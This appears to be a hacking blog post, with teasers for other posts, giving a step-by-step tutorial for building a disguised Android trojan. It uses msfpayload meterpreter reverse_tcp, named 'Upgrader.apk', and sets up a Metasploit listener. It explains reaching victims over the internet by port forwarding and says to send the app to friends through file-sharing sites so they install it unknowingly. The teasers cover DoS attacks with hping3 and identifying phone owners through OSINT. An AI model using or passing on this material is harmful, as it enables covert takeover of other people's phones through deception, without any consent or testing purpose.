Skip to main content

Hack Android Using Kali (Remotely)

By

Hack Android Using Kali (Remotely)

Hello Hackers! Welcome to arab black hat blog:
This is a tutorial explaining how to hack android phones with Kali.
I can't see any tutorials explaining this Hack/Exploit, so, I made one.
(Still ,you may already know about this)

Step 1: Fire-Up Kali:

  • Open a terminal, and make a Trojan .apk
  • You can do this by typing :
  • msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP)
  • You can also hack android on WAN i.e. through Interet by using your Public/External IP in the LHOST and by port forwarding (ask me about port forwarding if you have problems in the comment section)

Step 2: Open Another Terminal:

  • Open another terminal until the file is being produced.
  • Load metasploit console, by typing : msfconsole

Step 3: Set-Up a Listener:

  • After it loads(it will take time), load the multi-handler exploit by typing : use exploit/multi/handler
  • Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp
  • To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external)

Step 4: Exploit!


  • At last type: exploit to start the listener.
  • Copy the application that you made (Upgrader.apk) from the root folder, to you android phone.
  •  
  • Then send it using Uploading it to Dropbox or any sharing website (like: www.speedyshare.com).
  • Then send the link that the Website gave you to your friends and exploit their phones (Only on LAN, but if you used the WAN method then you can use the exploit anywhere on the INTERNET)
  • Let the Victim install the Upgrader app(as he would think it is meant to upgrade some features on his phone)
  • However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from the security settings of the android phone to allow the Trojan to install.
  • And when he clicks Open...

Step 5: BOOM!

There comes the meterpreter prompt:
------------------------------------------HACKED-------------------------------------------------

The END:

Keep coming for more!
Some post modules that work for windows might not work in android
For Eg: run killav, persistence (persistent backdoor) etc.
Labels:

Comments

Post a Comment

Popular posts from this blog

Find Identifying Information from a Phone Number Using OSINT Tools

By
Find Identifying Information from a Phone Number Using OSINT Tools Phone numbers often contain clues to the owner's identity and can bring up a lot of data during an OSINT investigation. Starting with a phone number, we can search through a large number of online databases with only a few clicks to discover information about a phone number. It can include the carrier, the owner's name and address, and even connected online accounts. While a phone number may not seem like much information to give out, an OSINT researcher can quickly discover information that ties a phone number to a variety of other clues. The data can be used to detect whether a phone number is a throwaway VoIP number used to hide the owner's identity or a cell phone belonging to a real person. In the event of buying something online or replying to an apartment ad,...
Post a Comment
Read more

How to use hping3 in kali Linux(Performing dos attack)

By
How to use hping3 in kali Linux (Performing dos attack) What is hping3 hping3 is a network tool able to send custom TCP/IP packets and to dis‐ play target replies like ping program does with ICMP replies. hping3 handle fragmentation, arbitrary packets body and size and can be used in order to transfer files encapsulated under supported protocols. Hping3 is extremely powerful you can do following things with hping3 Test firewall rules Advanced port scanning Test net performance using different protocols, packet size, TOS (type of service) and fragmentation. Path MTU discovery Transferring files between even really fascist firewall rules. Traceroute-like under different protocols. Firewalk-like usage. What is dos Attack Dos stands for denial of service. Dos attack shuts down Webservers/systems and completely makes them inaccessible to users. Dos attack floods target network with excess ...
Post a Comment
Read more

Scan Live hosts using Netdiscover in Kali Linux

By
Scan Live hosts using Netdiscover in Kali Linux Netdiscover is a simple tool to use.It uses (ARP)Address Resolution Protocol to find live hosts.Netdiscover discovers live hosts on a network but you must be connected to that network.  Netdiscover not only finds the live hosts also returns mac addresses and hostname. netdiscover is an active/passive arp reconnaissance tool, initially developed to gain information about wireless networks without dhcp servers in wardriving scenarios.  It can also be used on switched net‐ works. Built on top of libnet and libpcap, it can passively detect online hosts or search for them by sending arp requests. Start Netdiscover With the below command you can see all the options that we can use with netdiscover. root@seven:~# netdiscover -h  Netdiscover 0.3-pre-beta7 [Active/passive arp reconnaissance tool] -  i device: your network device ...
Post a Comment
Read more